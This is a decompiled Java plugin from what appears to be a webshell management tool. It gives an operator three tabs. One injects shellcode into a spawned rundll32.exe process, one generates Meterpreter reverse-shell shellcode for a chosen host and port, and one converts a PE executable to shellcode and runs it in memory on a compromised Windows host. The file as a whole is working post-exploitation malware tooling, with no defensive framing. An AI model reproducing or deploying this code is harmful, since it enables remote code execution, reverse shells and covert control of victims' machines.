package shells.plugins.generic;

import com.intellij.uiDesigner.UIFormXmlConstants;
import com.kichik.pecoff4j.PE;
import com.kichik.pecoff4j.io.PEParser;
import core.EasyI18N;
import core.Encoding;
import core.imp.Payload;
import core.imp.Plugin;
import core.shell.ShellEntity;
import core.ui.component.RTextArea;
import core.ui.component.dialog.GFileChooser;
import core.ui.component.dialog.GOptionPane;
import java.awt.BorderLayout;
import java.awt.event.ActionEvent;
import java.awt.event.ComponentAdapter;
import java.awt.event.ComponentEvent;
import java.io.ByteArrayInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.InputStream;
import javax.swing.JButton;
import javax.swing.JLabel;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JSplitPane;
import javax.swing.JTabbedPane;
import javax.swing.JTextField;
import javax.swing.border.TitledBorder;
import org.fife.ui.rtextarea.RTextScrollPane;
import org.sqlite.util.OSInfo;
import util.Log;
import util.UiFunction;
import util.automaticBindClick;
import util.functions;
import util.http.ReqParameter;

/* loaded from: input_file:shells/plugins/generic/ShellcodeLoader.class */
public abstract class ShellcodeLoader implements Plugin {
    private static final String spawnto_x86 = "C:\\Windows\\SysWOW64\\rundll32.exe";
    private static final String spawnto_x64 = "C:\\Windows\\System32\\rundll32.exe";
    protected boolean loadState;
    protected ShellEntity shellEntity;
    protected Payload payload;
    protected Encoding encoding;
    public ShellcodeLoader childLoder;
    protected JPanel panel = new JPanel(new BorderLayout());
    private JPanel shellcodeLoaderPanel = new JPanel(new BorderLayout());
    private JPanel meterpreterPanel = new JPanel(new BorderLayout());
    private JPanel memoryPePanel = new JPanel(new BorderLayout());
    private JLabel excuteFileLabel = new JLabel("注入进程文件: ");
    private JTextField excuteFileTextField = new JTextField(spawnto_x64, 50);
    private JLabel hostLabel = new JLabel("host :");
    private JLabel portLabel = new JLabel("port :");
    private JLabel archLabel = new JLabel(String.format("Arch:%s", "none"));
    private JLabel arch2Label = new JLabel(String.format("Arch:%s", "none"));
    protected JButton loadButton = new JButton("Load");
    protected JButton runButton = new JButton("Run");
    private JButton goButton = new JButton("Go");
    private JButton loadPeButton = new JButton("LoadPe");
    private JLabel argsLabel = new JLabel("args");
    private JLabel readWaitLabel = new JLabel("readWait(ms)");
    private JTextField argsTextField = new JTextField("");
    private JTextField readWaitTextField = new JTextField("7000");
    private RTextArea memoryPeTextArea = new RTextArea();
    protected RTextArea shellcodeTextArea = new RTextArea();
    protected JSplitPane meterpreterSplitPane = new JSplitPane();
    private RTextArea tipTextArea = new RTextArea();
    private JTextField hostTextField = new JTextField("127.0.0.1", 15);
    private JTextField portTextField = new JTextField("4444", 7);
    protected JSplitPane splitPane = new JSplitPane();
    protected JTabbedPane tabbedPane = new JTabbedPane();

    public ShellcodeLoader() {
        this.splitPane.setOrientation(0);
        this.splitPane.setDividerSize(0);
        this.meterpreterSplitPane.setOrientation(0);
        this.meterpreterSplitPane.setDividerSize(0);
        JPanel jPanel = new JPanel();
        jPanel.add(this.excuteFileLabel);
        jPanel.add(this.excuteFileTextField);
        jPanel.add(this.arch2Label);
        jPanel.add(this.loadButton);
        jPanel.add(this.runButton);
        this.splitPane.setTopComponent(jPanel);
        this.splitPane.setBottomComponent(new RTextScrollPane(this.shellcodeTextArea));
        this.splitPane.addComponentListener(new ComponentAdapter() { // from class: shells.plugins.generic.ShellcodeLoader.1
            public void componentResized(ComponentEvent componentEvent) {
                ShellcodeLoader.this.splitPane.setDividerLocation(0.15d);
            }
        });
        this.shellcodeTextArea.setAutoscrolls(true);
        this.shellcodeTextArea.setBorder(new TitledBorder("shellcode hex"));
        this.shellcodeTextArea.setText("");
        this.tipTextArea.setAutoscrolls(true);
        this.tipTextArea.setBorder(new TitledBorder("tip"));
        this.tipTextArea.setText("");
        this.shellcodeLoaderPanel.add(this.splitPane);
        JPanel jPanel2 = new JPanel();
        jPanel2.add(this.hostLabel);
        jPanel2.add(this.hostTextField);
        jPanel2.add(this.portLabel);
        jPanel2.add(this.portTextField);
        jPanel2.add(this.archLabel);
        jPanel2.add(this.goButton);
        this.meterpreterSplitPane.setTopComponent(jPanel2);
        this.meterpreterSplitPane.setBottomComponent(new JScrollPane(this.tipTextArea));
        this.meterpreterPanel.add(this.meterpreterSplitPane);
        JPanel jPanel3 = new JPanel();
        jPanel3.add(this.argsLabel);
        jPanel3.add(this.argsTextField);
        jPanel3.add(this.readWaitLabel);
        jPanel3.add(this.readWaitTextField);
        jPanel3.add(this.loadPeButton);
        JSplitPane jSplitPane = new JSplitPane(0);
        jSplitPane.setTopComponent(jPanel3);
        jSplitPane.setBottomComponent(new RTextScrollPane(this.memoryPeTextArea));
        this.memoryPePanel.add(jSplitPane);
        this.tabbedPane.addTab("shellcodeLoader", this.shellcodeLoaderPanel);
        this.tabbedPane.addTab("meterpreter", this.meterpreterPanel);
        this.tabbedPane.addTab("memoryPe", this.memoryPePanel);
        this.panel.add(this.tabbedPane);
    }

    public abstract boolean load();

    public abstract String getClassName();

    private void loadButtonClick(ActionEvent actionEvent) {
        if (this.loadState) {
            GOptionPane.showMessageDialog(this.panel, "Loaded", "提示", 1);
            return;
        }
        try {
            if (load()) {
                this.loadState = true;
                GOptionPane.showMessageDialog(this.panel, "Load success", "提示", 1);
            } else {
                GOptionPane.showMessageDialog(this.panel, "Load fail", "提示", 2);
            }
        } catch (Exception e) {
            Log.error(e);
            GOptionPane.showMessageDialog(this.panel, e.getMessage(), "提示", 2);
        }
    }

    private void runButtonClick(ActionEvent actionEvent) {
        if (!this.loadState && spawnto_x86.equals(this.excuteFileTextField.getText()) && this.payload.getFileSize(spawnto_x86) <= 0) {
            this.excuteFileTextField.setText(spawnto_x64);
        }
        load();
        String trim = this.shellcodeTextArea.getText().trim();
        if (trim.length() > 0) {
            String Decoding = this.encoding.Decoding(runShellcode(functions.hexToByte(trim)));
            Log.log(Decoding, new Object[0]);
            GOptionPane.showMessageDialog(this.panel, Decoding, "提示", 1);
        }
    }

    private void goButtonClick(ActionEvent actionEvent) {
        try {
            String Decoding = this.encoding.Decoding(runShellcode(functions.hexToByte(getMeterpreterShellcodeHex(this.hostTextField.getText().trim(), Integer.parseInt(this.portTextField.getText()), this.payload.isX64()))));
            Log.log(Decoding, new Object[0]);
            GOptionPane.showMessageDialog(this.panel, Decoding, "提示", 1);
        } catch (Exception e) {
            GOptionPane.showMessageDialog(this.panel, e.getMessage(), "提示", 2);
        }
    }

    private void loadPeButtonClick(ActionEvent actionEvent) {
        GFileChooser gFileChooser = new GFileChooser();
        gFileChooser.setFileSelectionMode(0);
        boolean z = 0 == gFileChooser.showDialog(new JLabel(), "选择");
        File selectedFile = gFileChooser.getSelectedFile();
        if (!z || selectedFile == null) {
            return;
        }
        try {
            try {
                this.memoryPeTextArea.append(String.format("%s\n", new String(runPe(this.excuteFileTextField.getText() + " " + this.argsTextField.getText().trim(), functions.readInputStreamAutoClose(new FileInputStream(selectedFile.getAbsolutePath())), Integer.parseInt(this.readWaitTextField.getText().trim())))));
            } catch (Exception e) {
                GOptionPane.showMessageDialog(UiFunction.getParentFrame(this.memoryPePanel), e.getMessage());
            }
        } catch (Exception e2) {
            this.memoryPeTextArea.append(String.format("%s\n", functions.printStackTrace(e2)));
        }
    }

    private byte[] runShellcode(byte[] bArr) {
        return runShellcode(this.excuteFileTextField.getText(), bArr, 0);
    }

    private byte[] runShellcode(long j, byte[] bArr) {
        load();
        ReqParameter reqParameter = new ReqParameter();
        reqParameter.add(UIFormXmlConstants.ATTRIBUTE_TYPE, "pid");
        reqParameter.add("shellcode", bArr);
        reqParameter.add("excuteFile", this.excuteFileTextField.getText());
        return this.payload.evalFunc(getClassName(), "run", reqParameter);
    }

    public byte[] runShellcode(String str, byte[] bArr, int i) {
        return runShellcode(new ReqParameter(), str, bArr, i);
    }

    public byte[] runShellcode(ReqParameter reqParameter, String str, byte[] bArr, int i) {
        if (this.childLoder != null) {
            return this.childLoder.runShellcode(reqParameter, str, bArr, i);
        }
        load();
        if (str == null || str.trim().isEmpty()) {
            reqParameter.add(UIFormXmlConstants.ATTRIBUTE_TYPE, "local");
        } else {
            reqParameter.add("excuteFile", str);
            reqParameter.add(UIFormXmlConstants.ATTRIBUTE_TYPE, "start");
        }
        reqParameter.add("shellcode", bArr);
        reqParameter.add("readWaitTime", Integer.toString(i));
        return this.payload.evalFunc(getClassName(), "run", reqParameter);
    }

    public byte[] runPe(byte[] bArr) throws Exception {
        return runPe(this.excuteFileTextField.getText(), bArr, 0);
    }

    public byte[] runPe(String str, byte[] bArr, int i) throws Exception {
        if (bArr == null || str == null || str.trim().isEmpty()) {
            throw new UnsupportedOperationException(EasyI18N.getI18nString("只支持远程注入!!!"));
        }
        PE parse = PEParser.parse(new ByteArrayInputStream(bArr));
        if (this.payload.isX64() != parse.is64()) {
            String i18nString = EasyI18N.getI18nString("当前进程是Arch:%s Pe是%s");
            Object[] objArr = new Object[2];
            objArr[0] = this.payload.isX64() ? "x64" : OSInfo.X86;
            objArr[1] = parse.is64() ? "x64" : OSInfo.X86;
            throw new UnsupportedOperationException(String.format(i18nString, objArr));
        }
        StringBuilder sb = new StringBuilder();
        byte[] peToShellcode = PeLoader.peToShellcode(bArr, sb);
        this.memoryPeTextArea.append(sb.toString());
        if (peToShellcode != null) {
            return runShellcode(str, peToShellcode, i);
        }
        throw new UnsupportedOperationException(EasyI18N.getI18nString("PeToShellcode时 发生错误!"));
    }

    public byte[] runPe2(String str, byte[] bArr, int i) throws Exception {
        if (bArr == null || str == null || str.trim().isEmpty()) {
            throw new UnsupportedOperationException(EasyI18N.getI18nString("只支持远程注入!!!"));
        }
        PE parse = PEParser.parse(new ByteArrayInputStream(bArr));
        if (this.payload.isX64() != parse.is64()) {
            String i18nString = EasyI18N.getI18nString("当前进程是Arch:%s Pe是%s");
            Object[] objArr = new Object[2];
            objArr[0] = this.payload.isX64() ? "x64" : OSInfo.X86;
            objArr[1] = parse.is64() ? "x64" : OSInfo.X86;
            throw new UnsupportedOperationException(String.format(i18nString, objArr));
        }
        StringBuilder sb = new StringBuilder();
        byte[] peToShellcode = PeLoader.peToShellcode(bArr, sb);
        this.memoryPeTextArea.append(sb.toString());
        if (peToShellcode != null) {
            return runShellcode(this.excuteFileTextField.getText() + " " + str, peToShellcode, i);
        }
        throw new UnsupportedOperationException(EasyI18N.getI18nString("PeToShellcode时 发生错误!"));
    }

    @Override // core.imp.Plugin
    public void init(ShellEntity shellEntity) {
        this.shellEntity = shellEntity;
        this.payload = this.shellEntity.getPayloadModule();
        this.encoding = Encoding.getEncoding(this.shellEntity);
        automaticBindClick.bindJButtonClick(ShellcodeLoader.class, this, ShellcodeLoader.class, this);
        JLabel jLabel = this.arch2Label;
        Object[] objArr = new Object[1];
        objArr[0] = this.payload.isX64() ? "x64" : OSInfo.X86;
        jLabel.setText(String.format("Arch:%s", objArr));
        JLabel jLabel2 = this.archLabel;
        Object[] objArr2 = new Object[1];
        objArr2[0] = this.payload.isX64() ? "x64" : OSInfo.X86;
        jLabel2.setText(String.format("Arch:%s", objArr2));
        if (this.payload.isX64()) {
            this.excuteFileTextField.setText(spawnto_x64);
        } else {
            this.excuteFileTextField.setText(spawnto_x86);
        }
        updateMeterpreterTip();
    }

    @Override // core.imp.Plugin
    public JPanel getView() {
        return this.panel;
    }

    public String getMeterpreterShellcodeHex(String str, int i, boolean z) {
        String str2 = "";
        try {
            Object[] objArr = new Object[1];
            objArr[0] = z ? "64" : "";
            InputStream resourceAsStream = ShellcodeLoader.class.getResourceAsStream(String.format("assets/reverse%s.bin", objArr));
            String str3 = new String(functions.readInputStream(resourceAsStream));
            resourceAsStream.close();
            str2 = str3.replace("{host}", functions.byteArrayToHex(functions.ipToByteArray(str))).replace("{port}", functions.byteArrayToHex(functions.shortToByteArray((short) i)));
        } catch (Exception e) {
            Log.error(e);
        }
        return str2;
    }

    private void updateMeterpreterTip() {
        try {
            boolean isX64 = this.payload.isX64();
            InputStream resourceAsStream = ShellcodeLoader.class.getResourceAsStream("assets/meterpreterTip.txt");
            String str = new String(functions.readInputStream(resourceAsStream));
            resourceAsStream.close();
            this.tipTextArea.setText(str.replace("{arch}", isX64 ? "/x64" : ""));
        } catch (Exception e) {
            Log.error(e);
        }
    }
}
